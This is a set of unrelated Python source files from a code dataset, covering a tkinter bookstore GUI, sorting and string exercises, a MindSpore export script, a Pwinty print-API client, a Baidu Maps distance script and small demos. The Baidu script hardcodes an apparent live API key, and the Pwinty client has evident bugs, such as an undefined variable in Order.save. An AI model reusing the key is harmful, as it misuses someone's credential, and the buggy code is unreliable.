ent_year.delete(0,tk.END)\r\n ent_year.insert(tk.END,selected_tuple[3])\r\n ent_isbn.delete(0,tk.END)\r\n ent_isbn.insert(tk.END,selected_tuple[4])\r\n except IndexError:\r\n pass\r\n \r\ndef view_in_listbox():\r\n list_box.delete(0,tk.END)#empty the list, won't allow adding more rows if view is clicked multiple times \r\n for row in book_store_backend_networked.view_all():\r\n list_box.insert(tk.END, row)# \"END\" inserts a new row at the end of the existing rows\r\n #print(row)\r\n \r\ndef search_command():\r\n list_box.delete(0,tk.END)\r\n for row in book_store_backend_networked.search(ent_title.get(),ent_author.get(),ent_year.get(),ent_isbn.get()):\r\n list_box.insert(tk.END, row)\r\n \r\ndef add_entry():\r\n book_store_backend_networked.add(ent_title.get(),ent_author.get(),ent_year.get(),ent_isbn.get())\r\n list_box.delete(0,tk.END)\r\n list_box.insert(tk.END, (ent_title.get(),ent_author.get(),ent_year.get(),ent_isbn.get()))\r\n view_in_listbox()\r\n \r\ndef delete_command():\r\n book_store_backend_networked.delete(selected_tuple[0])\r\n #print(selected_tuple)\r\n #print(selected_tuple[0])\r\n view_in_listbox()\r\n \r\ndef update_command():\r\n book_store_backend_networked.update(selected_tuple[0],ent_title.get(),ent_author.get(),ent_year.get(),ent_isbn.get())\r\n view_in_listbox()\r\n \r\nwindow_main = tk.Tk()\r\nwindow_main.wm_title(\"Book Store NetDB 3.0\")\r\n\r\nl_title = tk.Label(window_main,text=\"Title\",anchor=tk.CENTER)\r\nl_title.grid(row=0,column=0)\r\n\r\nl_year = tk.Label(window_main,text=\"Year\",anchor=tk.CENTER)\r\nl_year.grid(row=1,column=0)\r\n\r\nl_author = tk.Label(window_main,text=\"Author\",anchor=tk.CENTER)\r\nl_author.grid(row=0,column=2)\r\n\r\nl_isbn = tk.Label(window_main,text=\"ISBN\",anchor=tk.CENTER)\r\nl_isbn.grid(row=1,column=2)\r\n\r\nent_title=tk.StringVar()\r\nent_title=tk.Entry(window_main,textvariable=ent_title)\r\nent_title.grid(row=0,column=1)\r\n\r\nent_author=tk.StringVar()\r\nent_author=tk.Entry(window_main,textvariable=ent_author)\r\nent_author.grid(row=0,column=3)\r\n\r\nent_year=tk.StringVar()\r\nent_year=tk.Entry(window_main,textvariable=ent_year)\r\nent_year.grid(row=1,column=1)\r\n\r\nent_isbn=tk.StringVar()\r\nent_isbn=tk.Entry(window_main,textvariable=ent_isbn)\r\nent_isbn.grid(row=1,column=3)\r\n\r\nbtn_view_all=tk.Button(window_main,text=\"View All\", width=12, command = view_in_listbox)\r\nbtn_view_all.grid(row=2,column=3)\r\n\r\nbtn_search=tk.Button(window_main,text=\"Search\", width=12, command = search_command)\r\nbtn_search.grid(row=3,column=3)\r\n\r\nbtn_add=tk.Button(window_main,text=\"Add\", width=12, command = add_entry)\r\nbtn_add.grid(row=4,column=3)\r\n\r\nbtn_update=tk.Button(window_main,text=\"Update\", width=12, command = update_command)\r\nbtn_update.grid(row=5,column=3)\r\n\r\nbtn_delete=tk.Button(window_main,text=\"Delete\", width=12, command = delete_command)\r\nbtn_delete.grid(row=6,column=3)\r\n\r\nbtn_close=tk.Button(window_main,text=\"Close\", width=12, command = window_main.destroy)\r\nbtn_close.grid(row=7,column=3)\r\n\r\nlist_box=tk.Listbox(window_main,height=6,width=35)\r\nlist_box.grid(row=2, column=0, rowspan=6, columnspan=2)\r\n\r\nscroll_bar=tk.Scrollbar(window_main)\r\nscroll_bar.grid(row=2, column=2, rowspan=6)\r\n\r\nlist_box.configure(yscrollcommand=scroll_bar.set)\r\nscroll_bar.configure(command=list_box.yview)\r\n\r\nlist_box.bind('<<ListboxSelect>>',
get_selected_row)\r\n\r\nwindow_main.mainloop()","sub_path":"Section_22_App_5_Build_a_Desktop_Database/book_store_frontend_networked_V3.py","file_name":"book_store_frontend_networked_V3.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65792647","text":"\n\ndef ep(s, l, r):\n\tls = len(s)\n\twhile l >= 0 and r < ls and s[l] == s[r]:\n\t\tl -= 1\n\t\tr += 1\n\treturn l + 1, r - 1\n\ndef f(st):\n\tls = len(st)\n\t'''\n\tif ls < 2:\n\t\treturn st\n\t'''\n\ts = 0\n\te = 0\n\tfor i in range(ls):\n\t\t# 中心就是i和i之间的位置\n\t\ts1, e1 = ep(st, i, i)\n\t\t# 中心就是i和i + 1之间的位置\n\t\ts2, e2 = ep(st, i, i + 1)\n\t\tif e1 - s1 > e - s:\n\t\t\ts = s1\n\t\t\te = e1\n\t\tif e2 - s2 > e - s:\n\t\t\ts = s2\n\t\t\te = e2\n\n\treturn st[s: e + 1]\n\nif __name__ == '__main__':\n\ts = 'ab'\n\tprint(f(s))\n","sub_path":"wait_merge/leetcode/Algorithms/M.5.最长回文子串/finish.py","file_name":"finish.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483724671","text":"import sys\nsys.stdin = open(\"input.txt\")\nT = 10\nfor tc in range(1, T+1):\n N = int(input())\n arr = input()\n\n stack1 = []\n result = 1\n #왼쪽괄호들을 다 스택에 저장하고 오른쪽 괄호를 만난다면 pop해서 비교\n for i in range(N):\n if arr[i] == '(' or arr[i] == '{' or arr[i] == '[' or arr[i] == '<':\n stack1.append(arr[i])\n\n if arr[i] == ')':\n if len(stack1) > 0 and stack1.pop() != '(':\n result = 0\n break\n if arr[i] == '}':\n if len(stack1) > 0 and stack1.pop() != '{':\n result = 0\n break\n if arr[i] == ']':\n if len(stack1) > 0 and stack1.pop() != '[':\n result = 0\n break\n if arr[i] == '>':\n if len(stack1) > 0 and stack1.pop() != '<':\n result = 0\n break\n\n\n\n print(\"#{} {}\".format(tc,result ))\n\n\n\n\n","sub_path":"SWEA/1218_괄호짝짓기/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"22127916","text":"# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"\n##############export checkpoint file into air, mindir and onnx models#################\n\"\"\"\nimport numpy as np\nfrom mindspore import Tensor, context, load_checkpoint, export, load_param_into_net\nfrom eval import ModelBuilder\n\nfrom src.model_utils.config import config\nfrom src.model_utils.moxing_adapter import moxing_wrapper\n\n\ncontext.set_context(mode=context.GRAPH_MODE,\n device_target=config.device_target,\n max_call_depth=10000)\n\ndef modelarts_pre_process():\n pass\n\n@moxing_wrapper(pre_process=modelarts_pre_process)\ndef export_fibinet():\n \"\"\" export_fibinet \"\"\"\n net_builder = ModelBuilder()\n _, eval_net = net_builder.get_net(config)\n\n param_dict = load_checkpoint(config.ckpt_file)\n load_param_into_net(eval_net, param_dict)\n 
eval_net.set_train(False)\n\n ids = Tensor(np.ones([config.eval_batch_size, config.field_size]).astype(np.int32))\n wts = Tensor(np.ones([config.eval_batch_size, config.field_size]).astype(np.float32))\n label = Tensor(np.ones([config.eval_batch_size, 1]).astype(np.float32))\n input_tensor_list = [ids, wts, label]\n export(eval_net, *input_tensor_list, file_name=config.file_name, file_format=config.file_format)\n\nif __name__ == '__main__':\n export_fibinet()\n","sub_path":"research/recommend/fibinet/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"146202549","text":"\"\"\"\nPython client for the Pwinty photo printing API\n\nCopyright Sam Willis 2014\nhttp://www.github.com/samwillis/py-pwinty\n\n\"\"\"\n\nimport requests # The only none standard requirement\nimport hashlib\nimport json\nimport os\n\n\napikey = None # Set to your Pwinty API Key\nsandbox = False # Sets whether to use the sandbox or live API\n\nVERSION = '0.4.0'\nAPI_VERSION = 'v4.0'\n\n# The HTTP endpoints for the api\nLIVE_API_URL = \"https://api.prodigi.com/%s/\" % API_VERSION\nSANDBOX_API_URL = \"https://api.sandbox.prodigi.com/%s/\" % API_VERSION\n\n\ndef set_apikey(value):\n \"\"\"\n This function can be used to set the API Key.\n Alternatvly you can do:\n >>> import pwinty\n >>> pwinty.apikey = \"xxxxxxx\"\n \"\"\"\n global apikey\n apikey = value\n\ndef underscore_to_camelcase(value):\n \"\"\"\n Converts underscore notation (something_named_this) to camelcase notation (somethingNamedThis)\n\n >>> underscore_to_camelcase('country_code')\n 'countryCode'\n >>> underscore_to_camelcase('country')\n 'country'\n >>> underscore_to_camelcase('price_GBP')\n 'priceGBP'\n >>> underscore_to_camelcase('recommended_horizontal_resolution')\n 'recommendedHorizontalResolution'\n >>> underscore_to_camelcase('postal_or_zip_code')\n 'postalOrZipCode'\n >>> underscore_to_camelcase('test_ABC_test')\n 'testABCTest'\n \"\"\"\n words = value.split('_')\n return '%s%s' % (words[0], ''.join(x if x.isupper() else x.capitalize() for x in words[1:]))\n\ndef underscore_to_camelcase_dict(d):\n \"Converts a dicts keys to camelcase\"\n return {underscore_to_camelcase(key):value for key, value in d.items()}\n\ndef camelcase_to_underscore(value):\n \"\"\"\n Converts camelcase notation (somethingNamedThis) to underscore notation (something_named_this)\n\n >>> camelcase_to_underscore('countryCode')\n 'country_code'\n >>> camelcase_to_underscore('country')\n 'country'\n >>> camelcase_to_underscore('priceGBP')\n 'price_GBP'\n >>> camelcase_to_underscore('recommendedHorizontalResolution')\n 'recommended_horizontal_resolution'\n >>> camelcase_to_underscore('postalOrZipCode')\n 'postal_or_zip_code'\n >>> camelcase_to_underscore('testABCTest')\n 'test_ABC_test'\n \"\"\"\n length = len(value)\n out = ''\n for i in xrange(length):\n char = value[i]\n last_char = value[i-1]\n next_char = None\n if i != length-1:\n next_char = value[i+1]\n if i == 0 or char.islower():\n out += char\n elif last_char.islower():\n if next_char and next_char.isupper():\n out += '_%s' % char\n else:\n out += '_%s' % char.lower()\n else:\n if next_char and next_char.islower():\n out += '_%s' % char.lower()\n else:\n out += char\n return out\n\ndef _request(end_point, method, params=None, data=None, files=None):\n headers = {\n 'X-API-Key': apikey,\n 'Content-type': 'application/json'\n\n }\n if not data and not files:\n headers['Content-Length'] = '0'\n\n if 
sandbox:\n url = SANDBOX_API_URL\n else:\n url = LIVE_API_URL\n\n if params:\n params = underscore_to_camelcase_dict(params)\n if data:\n data = underscore_to_camelcase_dict(data)\n data = json.dumps(data)\n if files:\n files = underscore_to_camelcase_dict(files)\n\n\n r = requests.request(method, url + end_point, headers=headers, params=params, data=data, files=files)\n\n\n if r.status_code in (200, 201):\n if r.text:\n print(r.text)\n print(r)\n return json.loads(r.text)\n else:\n return r.content\n else:\n if r.text:\n json_obj = json.loads(r.text)\n print(json_obj)\n print(r)\n print(r.text)\n if 'errorMessage' in json_obj:\n message = json_obj['errorMessage']\n else:\n message = json_obj\n print(message)\n response = r.text\n\n else:\n message = r.content\n response = r.content\n if r.status_code == 400:\n raise PwintyBadInputError(message, response)\n elif r.status_code == 403:\n raise PwintyForbiddenError(message, response)\n elif r.status_code == 404:\n raise PwintyMissingError(message, response)\n elif r.status_code == 500:\n raise PwintyServerError(message, response)\n else:\n raise PwintyError(message, response, r.status_code)\n\n\nclass Resource(object):\n def __init__(self, json):\n self._json = json\n\n _json = {}\n _id_field_name = None\n _editable_fields = ()\n\n def keys(self):\n hide_keys = ('photos',)\n return [camelcase_to_underscore(key) for key in self._json.keys() if key not in hide_keys] \n\n def get_dict(self):\n return {key: self.__getattr__(key) for key in self.keys()}\n\n def get_json(self):\n return self._json\n\n def items(self):\n return self.get_dict().items()\n\n def values(self):\n return self.get_dict().values()\n\n def __getattr__(self, name):\n name = underscore_to_camelcase(name)\n if name in self._json:\n value = self._json[name]\n if type(value) == dict:\n value = Resource(value)\n elif type(value) == list:\n value = [Resource(v) if type(v)==dict else v for v in value]\n return value\n else:\n raise ValueError()\n\n def __setattr__(self, name, value):\n nameC = underscore_to_camelcase(name)\n if nameC in self._json:\n if nameC in self._editable_fields:\n self._json[nameC] = value\n else:\n raise ValueError('Value readonly: %s' % name)\n else:\n super(Resource, self).__setattr__(name, value)\n\n def __cmp__(self, other):\n if self._id_field_name:\n return self.__getattr__(self._id_field_name) - other.__getattr__(self._id_field_name)\n else:\n super(Resource, self).__cmp__(other)\n\n # def __repr__(self):\n # id_string = ''\n # if self._id_field_name:\n # id_string = ' %s=%s' % (self._id_field_name, self.__getattr__(self._id_field_name))\n # return '<%s%s at %s>' % (type(self).__name__, id_string, hex(id(self)))\n\n\nclass Asset(Resource):\n _id_field_name = 'id'\n\n @classmethod\n def create(cls, **kwargs):\n files = None\n file_opend = False\n file_obj = None\n\n try:\n if \"file_path\" in kwargs:\n file_obj = open(kwargs.pop('file_path'), 'rb')\n file_opend = True\n\n elif \"file\" in kwargs:\n file_obj = kwargs.pop('file')\n\n elif \"url\" not in kwargs:\n raise PwintyException(\"file_path, file OR url required\")\n\n if file_obj:\n md5 = hashlib.md5(file_obj.read()).hexdigest()\n file_obj.seek(0) # The file will be read again for transmission\n filename = os.path.basename(file_obj.name)\n files = {'file': (filename, file_obj, 'image/jpeg')} # pwinty requires mime\n kwargs['md5Hash'] = md5\n\n finally:\n if file_opend:\n file_obj.close()\n\n return cls(kwargs)\n\nclass PhotoAssets(object):\n _asset_list = []\n\n def __init__(self, order_id):\n 
self._order_id = order_id\n\n def create(self, **kwargs):\n asset = Asset.create(**kwargs)\n self._asset_list.append(asset)\n return asset\n\n def all(self):\n return [o._json for o in self._asset_list]\n\n def clear(self):\n self._asset_list[:] = []\n return self._asset_list\n\nclass Photo(Resource):\n _id_field_name = 'id'\n _assets = []\n _attributes = ('finish',)\n\n\n @classmethod\n def create(cls, **kwargs):\n attributes = {}\n\n for name in cls._attributes:\n if name in kwargs:\n attributes[name] = kwargs.pop(name)\n\n kwargs['attributes'] = attributes\n\n return cls(kwargs)\n\n @property\n def assets(self):\n return PhotoAssets(self)\n\n def refresh(self):\n self._json['assets'] = self.assets.all()\n self.assets.clear()\n return self._json\n\n\n\nclass OrderPhotos(object):\n _photo_list = []\n\n def __init__(self, order_id):\n self._order_id = order_id\n\n def create(self, **kwargs):\n photo = Photo.create(**kwargs)\n self._photo_list.append(photo)\n return photo\n\n def get(self, id):\n return Photo.get(self._order_id, id)\n\n def all(self):\n return [o._json for o in self._photo_list]\n\n def clear(self):\n self._photo_list[:] = []\n return self._photo_list\n\n\nclass Order(Resource):\n _id_field_name = 'id'\n _editable_fields = ('name', 'line1', 'line2', 'townOrCity', 'stateOrCounty', 'postalOrZipCode', 'preferredShippingMethod',)\n _recipient = ('name',)\n _address = ('line1', 'line2', 'townOrCity', 'stateOrCounty', 'postalOrZipCode', 'countryCode',)\n\n\n @classmethod\n def create(cls, **kwargs):\n #take input and json-ize it immediately\n options = {}\n recipient = {}\n\n if 'line2' in kwargs :\n if kwargs['line2'] == '':\n kwargs.pop('line2')\n\n for name in cls._recipient:\n if name in kwargs:\n recipient[name] = kwargs.pop(name)\n\n for name in cls._address:\n if name in kwargs:\n options[name] = kwargs.pop(name)\n\n recipient['address'] = options\n kwargs['recipient'] = recipient\n\n return cls(kwargs)\n\n def save(self):\n options = {}\n for name in self._editable_fields:\n if name in self._json:\n options[name] = self._json[name]\n self._json = res # Update this object with any changes\n\n @property\n def photos(self):\n return OrderPhotos(self)\n\n def submit(self):\n self._json['items'] = self.photos.all()\n self.photos.clear()\n res = _request('Orders', 'POST', data=self._json)\n return res\n\n @classmethod\n def get(cls, id):\n res = _request('Orders/ord_%s' % id, 'GET')\n return cls(res)\n\nclass PwintyException(Exception):\n pass\n\n\nclass PwintyError(PwintyException):\n def __init__(self, message, response, status_code):\n self.message = message\n self.response = response\n self.status_code = status_code\n\n def __str__(self):\n return '%s (%s)' % (self.message, self.status_code)\n\n\nclass PwintyBadInputError(PwintyError):\n def __init__(self, message, response):\n super(PwintyBadInputError, self).__init__(message, response, 400)\n\n\nclass PwintyForbiddenError(PwintyError):\n def __init__(self, message, response):\n super(PwintyForbiddenError, self).__init__(message, response, 403)\n\n\nclass PwintyMissingError(PwintyError):\n def __init__(self, message, response):\n super(PwintyMissingError, self).__init__(message, response, 404)\n\n\nclass PwintyServerError(PwintyError):\n def __init__(self, message, response):\n super(PwintyServerError, self).__init__(message, response, 500)\n\n\nif __name__ == '__main__':\n import doctest\n 
doctest.testmod()\n\n\n","sub_path":"pwinty/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428028953","text":"import random\nfrom copy import copy\nimport time\n\n# 스택 구현\n\nclass Stack:\n def __init__(self):\n self.items = []\n\n def push(self, val):\n self.items.append(val)\n\n def pop(self):\n try:\n return self.items.pop()\n except IndexError:\n print(\"Stack is empty\")\n\n def top(self):\n try:\n return self.items[-1]\n except:\n print(\"Stack is empty\")\n\n def __len__(self):\n return len(self.items)\n\n def isEmpty(self):\n return self.__len__() == 0\n\n# 퀵 정렬 (재귀 사용)\ndef RQuickSort(arr):\n \n if len(arr) <= 1:\n \n return arr\n\n pivot = arr[len(arr) // 2]\n\n left = [x for x in arr if x < pivot]\n\n middle = [x for x in arr if x == pivot]\n\n right = [x for x in arr if x > pivot]\n\n return RQuickSort(left) + middle + RQuickSort(right)\n\n# 재귀 호출을 쓰지 않는 퀵 정렬 \n\ndef SQuickSort(input):\n pivotIndex = 0\n leftIndex = pivotIndex + 1\n rightIndex = len(input) - 1\n\n s = Stack()\n \n s.push(pivotIndex)\n s.push(rightIndex)\n\n while len(s.items) > 0:\n\n rightIndexOfSubSet = s.pop()\n leftIndexOfSubSet = s.pop()\n\n leftIndex = leftIndexOfSubSet + 1\n pivotIndex = leftIndexOfSubSet\n rightIndex = rightIndexOfSubSet\n \n pivot = input[pivotIndex]\n\n if leftIndex > rightIndex:\n continue\n\n while leftIndex < rightIndex:\n while (leftIndex <= rightIndex) and (input[leftIndex] <= pivot):\n leftIndex += 1\n\n while (leftIndex <= rightIndex) and (input[rightIndex] >= pivot):\n rightIndex -= 1\n\n if rightIndex >= leftIndex:\n SwapElement(input, leftIndex, rightIndex)\n\n\n if pivotIndex <= rightIndex:\n if input[pivotIndex] > input[rightIndex]:\n SwapElement(input, pivotIndex, rightIndex)\n\n if leftIndexOfSubSet < rightIndex:\n s.push(leftIndexOfSubSet)\n s.push(rightIndex - 1)\n\n if rightIndexOfSubSet > rightIndex:\n s.push(rightIndex + 1)\n s.push(rightIndexOfSubSet)\n\ndef SwapElement(arr, left, right):\n temp = arr[left]\n arr[left] = arr[right]\n arr[right] = temp\n\n\n\n\nstuGroup = []\nstuInfo = [0, 0, 0]\nstuNum = 50000\ninterval = 500\n\n\nfor i in range(stuNum):\n\n ID = '20'\n \n randNum = random.randint(13, 19)\n\n ID += str(randNum)\n\n for i in range(5):\n\n randNum = random.randint(0,9)\n \n ID += str(randNum)\n\n stuInfo[0] = int(ID)\n\n name = chr(random.randint(65,90))\n\n for i in range(9):\n\n randNum = random.randint(65, 90)\n \n name += chr(randNum)\n\n stuInfo[1] = name\n \n telNum = '010'\n\n for i in range(8):\n\n randNum = random.randint(0, 9)\n\n telNum += str(randNum)\n\n stuInfo[2] = telNum\n \n stuGroup.append(copy(stuInfo))\n\n\nRQstuGroup = copy(stuGroup)\n\ntimeB = time.time()\n\nRQstuGroup = RQuickSort(RQstuGroup)\n\ntimeA = time.time()\n\ntimeForR = timeA - timeB\n\nprint('퀵 정렬(재귀 사용)하는데 걸린 시간은:', timeForR, '초 입니다.')\n\nfor i in range(0, stuNum, interval):\n print(RQstuGroup[i])\nprint()\n\n\n\nSQstuGroup = copy(stuGroup)\n\ntimeB = time.time()\n\nSQuickSort(SQstuGroup)\n\ntimeA = time.time()\n\ntimeForS = timeA - timeB\n\nprint('퀵 정렬(재귀 사용 X)하는데 걸린 시간은:', timeForS, '초 입니다.')\n\nfor i in range(0, stuNum, interval):\n print(SQstuGroup[i])\nprint()\n\nif timeForR < timeForS:\n print('재귀 호출을 사용한 퀵 정렬이', timeForS-timeForR ,'초 더 빠릅니다.')\nelif timeForS < timeForR:\n print('재귀 호출을 사용하지 않은 퀵 정렬이', timeForR-timeForS ,'초 더 빠릅니다.')\nelse:\n print('속도가 
같습니다.')\n","sub_path":"datastructure-cpython/sort/비재귀호출버전.py","file_name":"비재귀호출버전.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"453121758","text":"import requests\nimport xlwings as xw\n\ncity_workbook = xw.Book('city_list.xlsx')\ncity_sheet = city_workbook.sheets[0]\ncity_list = city_sheet.range('a1').expand('table').value\n\nak = 'IxULBTs4uW26i9apebsyOupEP6STZDEw'\ngeocoding_url = 'http://api.map.baidu.com/geocoding/v3/'\ndirection_url = 'http://api.map.baidu.com/directionlite/v1/driving?origin={:.6f},{:.6f}&destination={:.6f},{:.6f}&ak=' + ak\n\ncity_cord = []\ncount = 1\nfor city in city_list:\n print(count)\n count += 1\n geocoding_param = {'address': city, 'ak': ak, 'output': 'json'}\n geocoding_request = requests.get(geocoding_url, geocoding_param)\n geocoding_result = geocoding_request.json()\n while geocoding_result['status'] != 0:\n print(geocoding_request.url)\n geocoding_request = requests.get(geocoding_url, geocoding_param)\n geocoding_result = geocoding_request.json()\n lng = geocoding_result['result']['location']['lng']\n lat = geocoding_result['result']['location']['lat']\n city_cord.append((lat, lng))\n\nprint(len(city_list) == len(city_cord))\n\ntable = []\ncount_1 = 1\nfor city_1 in city_cord:\n row = []\n count_2 = 1\n for city_2 in city_cord:\n direction_request = requests.get(direction_url.format(city_1[0], city_1[1], city_2[0], city_2[1]))\n direction_result = direction_request.json()\n if direction_result['status'] == 0:\n distance = direction_result['result']['routes'][0]['distance'] / 1000\n else:\n distance = 0\n row.append(distance)\n print(count_1, count_2, distance)\n count_2 += 1\n table.append(row)\n count_1 += 1\n\ncity_distance_workbook = xw.Book()\ncity_distance_sheet = city_distance_workbook.sheets[0]\ncity_distance_sheet.range('a1').value = table\ncity_distance_workbook.save('city_distance.xlsx')\n","sub_path":"city.py","file_name":"city.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"352612631","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 23 15:28:27 2020\n\n@author: user\n\"\"\"\n\nimport librosa\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nsr = 44100\n\n# %% ============== EXERCISE 1.2 ==============================\n\n# load files\n# eh\neh , _ = librosa.load('audio_files/eh.wav', sr)\n# oh\noh , _ = librosa.load('audio_files/oh.wav', sr)\n# th\nth , _ = librosa.load('audio_files/th.wav', sr)\n# dd\ndd , _ = librosa.load('audio_files/dd.wav', sr)\n\n# plot first 4410 samples from each waveforms (0.1 sec)\nplt.subplot(221)\nplt.plot( eh[:4410] ); plt.title('ah')\nplt.subplot(222)\nplt.plot( oh[:4410] ); plt.title('oh')\nplt.subplot(223)\nplt.plot( th[:4410] ); plt.title('th')\nplt.subplot(224)\nplt.plot( dd[:4410] ); plt.title('dd')\n\n\n# %% ============== EXERCISE 1.3 ==============================\n# \n# waveforms of 'eh', 'oh', 'dd' appear to be periodic\n# waveform of 'th' appears to be aperiodic\n# waveform of 'dd' is rough in comparison to 'ed' and 'od'","sub_path":"solutions_to_exercises/ex_1.py","file_name":"ex_1.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"280382166","text":"from periscope.models.chemokine import Chemokine\n\n\nvegfa = Chemokine(['VEGFA'], \"Vascular endothelial growth factor A\", 
['P15692'])\nartn = Chemokine(['ARTN'], \"Artemin\", ['Q5T4W7'])\ncxcl11 = Chemokine(['CXCL11'], \"C-X-C motif chemokine 11\", ['O14625'])\nmcp1 = Chemokine(['MCP-1', 'MCP1', 'CCL2', 'SCYA2', 'MCAF', 'HC11'], \"C-C motif chemokine 2\", ['P13500'])\nccl28 = Chemokine(['CCL28'], \"C-C motif chemokine 28\", ['Q9NRJ3'])\nccl20 = Chemokine(['CCL20'], \"C-C motif chemokine 20\", ['P78556'])\nccl11 = Chemokine(['CCL11'], \"Eotaxin\", ['P51671'])\nil6 = Chemokine(['IL6', 'IL-6'], \"Interleukin-6\", ['P05231'])\ncsf1 = Chemokine(['CSF1', 'CSF-1'], \"Macrophage colony-stimulating factor 1\", ['P09603'])\nenrage = Chemokine(['S100A12', 'EN-RAGE'], \"Protein S100-A12\", ['P80511'])\nccl23 = Chemokine(['CCL23'], \"C-C motif chemokine 23\", ['P55773'])\nccl19 = Chemokine(['CCL19'], \"C-C motif chemokine 19\", ['Q99731'])\nccl3 = Chemokine(['CCL3'], \"C-C motif chemokine 3\", ['P10147'])\ncxcl10 = Chemokine(['CXCL10'], \"C-X-C motif chemokine 10\", ['P02778'])\ncx3cl1 = Chemokine(['CX3CL1'], \"Fractalkine\", ['P78423'])\nccl4 = Chemokine(['CCL4'], \"C-C motif chemokine 4\", ['P13236'])\nmcp2 = Chemokine(['MCP2', 'MCP-2'], \"C-C motif chemokine 8\", ['P80075'])\nhgf = Chemokine(['HGF'], \"Hepatocyte growth factor\", ['P14210'])\ntnfsf14 = Chemokine(['TNFSF14'], \"Tumor necrosis factor ligand superfamily member 14\", ['O43557'])\ncxcl1 = Chemokine(['CXCL1'], \"Growth-regulated alpha protein\", ['P09341'])\ncxcl5 = Chemokine(['CXCL5'], \"C-X-C motif chemokine 5\", ['P42830'])\nupa = Chemokine(['uPA', 'PLAU'], \"Urokinase-type plasminogen activator\", ['P00749'])\nil8 = Chemokine(['IL-8', 'IL8'], \"Interleukin-8\", ['P10145'])\ncxcl6 = Chemokine(['CXCL6'], \"C-X-C motif chemokine 6\", ['P80162'])\ncxcl9 = Chemokine(['CXCL9'], \"C-X-C motif chemokine 9\", ['Q07325'])\nlaptgfb1 = Chemokine(['LAP TGF-beta-1', 'LAP TGFB1', 'LAP TGB-beta-1'], \"Transforming growth factor beta-1 proprotein\", ['P01137'])\n\nchemokines = [vegfa, artn, cxcl11, mcp1, ccl28, ccl20, ccl11, il6, csf1, enrage, ccl23, ccl19, ccl3, cxcl10, cx3cl1,\n ccl4, mcp2, hgf, tnfsf14, cxcl1, cxcl5, upa, il8, cxcl6, cxcl9, laptgfb1]\n","sub_path":"periscope/domain/chemokine.py","file_name":"chemokine.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"88455774","text":"import asyncio\n\nimport aioredis\n\n\nasync def main():\n redis = aioredis.from_url(\n \"redis://localhost\", encoding=\"utf-8\", decode_responses=True\n )\n\n async with redis.client() as conn:\n await conn.set(\"my_key\", \"my_value\")\n val = await conn.get(\"my_key\")\n print(val)\n\n\nasync def redis_pool():\n redis = aioredis.from_url(\n \"redis://localhost\", encoding=\"utf-8\", decode_responses=True\n )\n await redis.set(\"kkkkkk\", \"1234567\")\n val = await redis.get(\"kkkkkk\")\n print(val)\n\n\n# asyncio.run(main())\nasyncio.run(redis_pool())\n","sub_path":"asyncio/youtuoo/async_demos/s2/s4.py","file_name":"s4.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"324432349","text":"import os\nimport os.path as osp\nimport posixpath as px\nfrom typing import List, Dict, Set, Union\nimport re\n\n\ndef alpha_num_order(string: str) -> str:\n \"\"\" Returns all numbers on 5 digits to let sort the string with numeric order.\n Ex: alphaNumOrder(\"a6b12.125\") ==> \"a00006b00012.00125\"\n \"\"\"\n return ''.join([format(int(x), '05d') if x.isdigit()\n else x for x in re.split(r'(\\d+)', 
string)])\n\n\ndef add_to_dict(dictionary: dict, key: Union[int, str], value: Union[dict, set, list]) -> dict:\n \"\"\" Will add key-value pair to dictionary, otherwise will update key-value pair \"\"\"\n if key in dictionary:\n key_present = True\n child_value_type = type(dictionary[key])\n else:\n key_present = False\n child_value_type = type(value)\n\n if key_present:\n\n if child_value_type is list:\n dictionary[key].extend(value)\n else:\n dictionary[key].update(value)\n else:\n dictionary[key] = value\n return dictionary\n\n\ndef get_img_listing(in_dir: str) -> List[str]:\n allowed_extensions = ('.tif', '.tiff')\n listing = os.listdir(in_dir)\n img_listing = [f for f in listing if f.endswith(allowed_extensions)]\n return img_listing\n\n\ndef extract_digits_from_string(string: str):\n digits = [int(x) for x in re.split(r'(\\d+)', string) if x.isdigit()] # '1_00001_Z02_CH3' -> ['1', '00001', '02', '3']\n return digits\n\n\ndef create_arrangement_skeleton_by_channel_tile_zplane(listing: List[str]) -> Dict[int, Dict[int, Set[int]]]:\n tile_arrangement = dict()\n for file_name in listing:\n digits = extract_digits_from_string(file_name)\n tile = digits[1]\n zplane = digits[2]\n channel = digits[3]\n tile_arrangement = add_to_dict(tile_arrangement, channel, {})\n tile_arrangement[channel] = add_to_dict(tile_arrangement[channel], tile, {zplane})\n\n return tile_arrangement\n\n\ndef arrange_listing(img_dir: str, listing: List[str]) -> Dict[int, Dict[int, Dict[int, str]]]:\n pattern = 